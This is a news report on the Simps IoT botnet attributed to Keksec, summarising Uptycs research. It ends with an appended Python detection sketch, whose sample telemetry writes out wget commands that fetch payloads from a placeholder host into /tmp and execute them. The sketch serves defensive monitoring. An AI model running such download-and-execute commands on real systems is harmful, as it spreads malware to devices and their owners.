A recently developed botnet named “Simps” has appeared, carrying out distributed denial-of-service (DDoS) attacks on gaming targets & others using internet of things (IoT) nodes. It is part of the toolset used by the Keksec cyber-crime group, researchers commented.
The newly discovered malware infects IoT devices in tandem with the prolific Gafgyt botnet, using known security vulnerabilities.
According to the Uptycs threat research team, Simps was first seen in April being dropped on IoT devices by the Gafgyt botnet. Gafgyt (a.k.a. Bashlite) is a Linux-based botnet that was first uncovered in 2014.
Vulnerable IoT Devices
Gafgyt targets vulnerable IoT devices such as Huawei routers, Realtek routers & ASUS devices, which it then uses to launch large-scale DDoS attacks & to download next-stage payloads to infected machines. It recently added new exploits for initial compromise, targeting Huawei, Realtek & Dasan GPON devices.
In the current campaign, Gafgyt infects Realtek (CVE-2014-8361) & Linksys endpoints, & then fetches Simps. Simps itself then uses Mirai & Gafgyt modules for DDoS functionality, according to the analysis, released on Wednesday.
Another variant of the attack uses shell scripts for downloading Simps.
Discussions
The shell script & Gafgyt can deploy various next-stage Simps payloads for several Linux-based architectures, researchers noted, using the Wget utility. Wget is a legitimate software package for retrieving files from web servers using HTTP, HTTPS, FTP & FTPS.
Once the Simps binary executes, it drops a log file that records the fact that the target device is infected & connects to the command-&-control server (C2).
The infection logs share commonalities, which allowed the researchers to search for references to them across the broader web. This led to the discovery that the Simps author maintains a YouTube channel to offer demonstrations of the botnet’s functionality, & a Discord server to host discussions about the malware.
Early Stages
“The botnet might be in the early stages of development because of the presence of the log file after execution,” researchers observed, noting that leaving behind an easily discoverable artifact like that is not best practice for those trying to stay under the radar.
In any event, they identified a YouTube video created by a user named “itz UR0A,” entitled “Simps Botnet😈, Slamming!!!” – dating from April 24.
The YouTube link also contained a Discord server link for “UR0A”, which was also present in the infection log, the analysis found.
“The Discord server contained several discussions around DDoS activities & botnets carrying different names,” researchers noted. “One binary we identified in a chat conversation named gay.x86 displayed a message that ‘the system is pawned by md5hashguy.’”
Keksec
Thanks to certain Discord server messages, Uptycs attributed the activity to the Keksec group (a.k.a. Kek Security), which is a prolific threat group known for exploiting vulnerabilities to invade multiple architectures with polymorphic tools (these can include Linux & Windows payloads, & custom Python malware).
It’s constantly adding to its arsenal; in January, it was seen deploying the FreakOut Linux botnet malware, which does port scanning, information gathering, & data packet & network sniffing, along with DDoS & crypto mining.
IRC Botnets
“The group is actively constructing IRC botnets for the purposes of DDoS operations & crypto-jacking campaigns using both Doge & Monero,” according to a recent Lacework analysis of the group.
As evidence for Simps attribution, Uptycs discovered that one of the Discord messages contained a Gafgyt malware sample that contained an “Infected By Simps Botnet ;)” message.
“This malware dropped a file named ‘keksec.infected.you.log,’ that contained a message ‘you’ve been infected by urmommy, thanks for joining keksec.’”
Source Code
Also, Gafgyt is one of Keksec’s most-favoured tools, according to past analysis, & the group is known for mashing up its code with other binaries to create Franken-malware. For instance, Keksec also operates Hybrid MQ-keksec, a botnet created by combining & modifying the source code of Mirai & Gafgyt, Uptycs pointed out.
In the case of Simps, the binaries notably contain modules for launching DDoS attacks against gaming platforms like the Valve Source Engine & OVH. These were also seen in a variant of Gafgyt used by Keksec that targeted Huawei & Asus routers & killed its rival IoT botnets.
Protecting Against Botnets
Uptycs recommended some measures for enterprise users & administrators to identify & protect against botnet attacks:
- Regularly monitor the suspicious processes, events, & network traffic spawned on the execution of any untrusted binary/scripts.
- Always be cautious in executing shell scripts from unknown or untrusted sources.
- Keep systems & firmware updated with the latest releases & patches.
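The monitoring the first recommendation calls for, as an added example that is not part of the Uptycs analysis: a small rule that replays constructed process telemetry and flags the chain described above, a shell script fetching payloads with wget into a writable directory and then executing one, plus creation of the infection-log artifact named in the analysis. The event format, the example hostname and the file paths are assumptions made for the example.

```python
"""Detection sketch (added example, not from the Uptycs analysis): flag the
shell -> wget -> execute chain and the infection-log artifact on a host."""
import re
from collections import defaultdict

# Constructed sample telemetry: (pid, ppid, event kind, detail). Not a real capture;
# the hostname uses the reserved .invalid TLD and the paths are assumptions.
SAMPLE_EVENTS = [
    (100, 1,   "exec", "/bin/sh /tmp/update.sh"),
    (101, 100, "exec", "wget http://example.invalid/simps.arm7 -O /tmp/simps.arm7"),
    (102, 100, "exec", "wget http://example.invalid/simps.mips -O /tmp/simps.mips"),
    (103, 100, "exec", "chmod +x /tmp/simps.arm7"),
    (104, 100, "exec", "/tmp/simps.arm7"),
    (104, 100, "file_create", "/tmp/keksec.infected.you.log"),
    # benign: a package fetch into a cache directory that is never executed
    (200, 1,   "exec", "/bin/sh /etc/init.d/cron start"),
    (201, 200, "exec", "wget https://example.invalid/pkg.tar.gz -O /var/cache/pkg.tar.gz"),
]

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Artifact file name quoted in the Uptycs analysis.
ARTIFACT_NAMES = ("keksec.infected.you.log",)
# wget -O / curl -o writing to an explicit output path.
FETCH_RE = re.compile(r"^(wget|curl)\b.*\s(-O|-o)\s+(\S+)")

def detect(events):
    """Return human-readable findings for the two behaviours above."""
    findings = []
    fetched = defaultdict(set)  # parent shell pid -> paths written by wget/curl
    for pid, ppid, kind, detail in events:
        if kind == "exec":
            m = FETCH_RE.match(detail)
            if m and m.group(3).startswith(WRITABLE_DIRS):
                fetched[ppid].add(m.group(3))
            # the same parent shell now executes a file it just downloaded
            exe = detail.split()[0]
            if exe in fetched[ppid]:
                findings.append(f"download-and-execute chain: pid {pid} ran {exe}, "
                                f"fetched by shell pid {ppid} with {len(fetched[ppid])} payload(s)")
        elif kind == "file_create" and any(detail.endswith(n) for n in ARTIFACT_NAMES):
            findings.append(f"infection-log artifact: pid {pid} created {detail}")
    return findings

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```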